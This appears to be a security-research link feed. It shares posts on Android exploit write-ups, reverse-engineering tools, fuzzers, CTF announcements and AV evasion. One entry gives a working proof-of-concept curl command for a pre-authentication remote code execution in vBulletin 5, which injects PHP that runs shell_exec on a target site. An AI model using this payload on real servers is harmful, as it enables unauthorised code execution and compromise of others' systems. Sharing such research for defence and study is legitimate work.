Exploiting Android Messengers with WebRTC: Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html #android #exploit #dukeBarman
Blogspot
Exploiting Android Messengers with WebRTC: Part 1
Posted by Natalie Silvanovich, Project Zero This is a three-part series on exploiting messenger applications using vulnerabilities in We...
Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary https://github.com/sibears/IDAGolangHelper #ida #reverse #dukeBarman
GitHub
GitHub - sibears/IDAGolangHelper: Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary
Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary - sibears/IDAGolangHelper
MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle https://googleprojectzero.blogspot.com/2020/08/mms-exploit-part-4-completing-aslr-oracle.html #exploit #android #dukeBarman
Blogspot
MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle
Posted by Mateusz Jurczyk, Project Zero This post is the fourth of a multi-part series capturing my journey from discovering a vulnerabl...
Why are Frida and QBDI a Great Blend on Android? https://blog.quarkslab.com/why-are-frida-and-qbdi-a-great-blend-on-android.html #android #frida #dukeBarman
Quarkslab
Why are Frida and QBDI a Great Blend on Android? - Quarkslab's blog
This blog post dives into how to get a better understanding of an Android native function by taking full advantage of both Frida and QBDI.
Announcing the Seventh Annual Flare-On Challenge https://www.fireeye.com/blog/threat-research/2020/08/announcing-the-seventh-annual-flare-on-challenge.html #reverse #CTF #dukeBarman
Google Cloud Blog
7th Annual Flare-On Challenge | Reverse Engineering Challenge | Google Cloud Blog
The Front Line Applied Research & Expertise (FLARE) team is honored to announce that the popular Flare-On challenge will return for a seventh year.
SVE-2019-15230: A bug collision https://allsoftwaresucks.blogspot.com/2020/08/sve-2019-15230-bug-collision.html #android #dukeBarman
Blogspot
SVE-2019-15230: A bug collision
Researchers from Team T5 recently published their write-up on exploiting a bug in S-Boot and obtaining code execution in the Samsung Secure ...
Exploiting Android Messengers with WebRTC: Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html #exploit #android #dukeBarman
Blogspot
Exploiting Android Messengers with WebRTC: Part 2
Posted by Natalie Silvanovich, Project Zero This is a three-part series on exploiting messenger applications using vulnerabilities in WebR...
Attack Secure Boot of SEP https://github.com/windknown/presentations/raw/master/Attack_Secure_Boot_of_SEP.pdf #exploitation #iOS #dukeBarman
Fuzzing the Windows API for AV Evasion
https://winternl.com/fuzzing-the-windows-api-for-av-evasion/
#reverse #malware #fuzzing #win #Thatskriptkid
winternl
Fuzzing the Windows API for AV Evasion
Malware Detection Systems (MDSs) use a technique called emulation as perhaps their most effective weapon against novel malware threats. Emulation does not rely on the static structure or signature of…
https://arstechnica.com/information-technology/2020/08/snapdragon-chip-flaws-put-1-billion-android-phones-at-risk-of-data-theft/ #Gyokuyou
Ars Technica
Snapdragon chip flaws put >1 billion Android phones at risk of data theft
There's no word on when Google and phone makers will incorporate fix from Qualcomm.
A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1n
CTF for #r2con2020 is officially open: https://ctf.radare.org/welcome.html #reverse #CTF #dukeBarman
Introduction to Whiteboxes and Collision-Based Attacks With QBDI
https://blog.quarkslab.com/introduction-to-whiteboxes-and-collision-based-attacks-with-qbdi.html
#crypto #whitebox #waes #darw1n
Quarkslab
Introduction to Whiteboxes and Collision-Based Attacks With QBDI - Quarkslab's blog
This post is a noob-friendly introduction to whiteboxes along with the presentation and explanation of a (not-new) collision-based attack. The attack is demonstrated against a public whitebox, using QBDI to instrument and analyze the target in order to produce…
Fuzzing JavaScript Engines with Aspect-preserving Mutation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javascript #darw1n
GitHub
GitHub - sslab-gatech/DIE: Fuzzing JavaScript Engines with Aspect-preserving Mutation
Fuzzing JavaScript Engines with Aspect-preserving Mutation - sslab-gatech/DIE
Storm - a blackbox mutational fuzzer for detecting critical bugs in SMT solvers Article: https://numairmansur.github.io/STORM.pdf Code: https://github.com/Practical-Formal-Methods/storm #fuzzing #dukeBarman
Enumy - Linux post exploitation privilege escalation enumeration https://github.com/luke-goddard/enumy #links #linux #ctf #exploitation
GitHub
GitHub - luke-goddard/enumy: Linux post exploitation privilege escalation enumeration
Linux post exploitation privilege escalation enumeration - luke-goddard/enumy
RetDec IDA plugin version 1.0 is out:
https://engineering.avast.io/retdec-ida-plugin-v1-0-is-out/
#reverse #ida #KosBeg
idapm is IDA Plugin Manager via GitHub Repository https://github.com/tkmru/idapm #reverse #ida #dukeBarman
GitHub
GitHub - tkmru/idapm: idapm is IDA Plugin Manager via GitHub Repository.
idapm is IDA Plugin Manager via GitHub Repository. - tkmru/idapm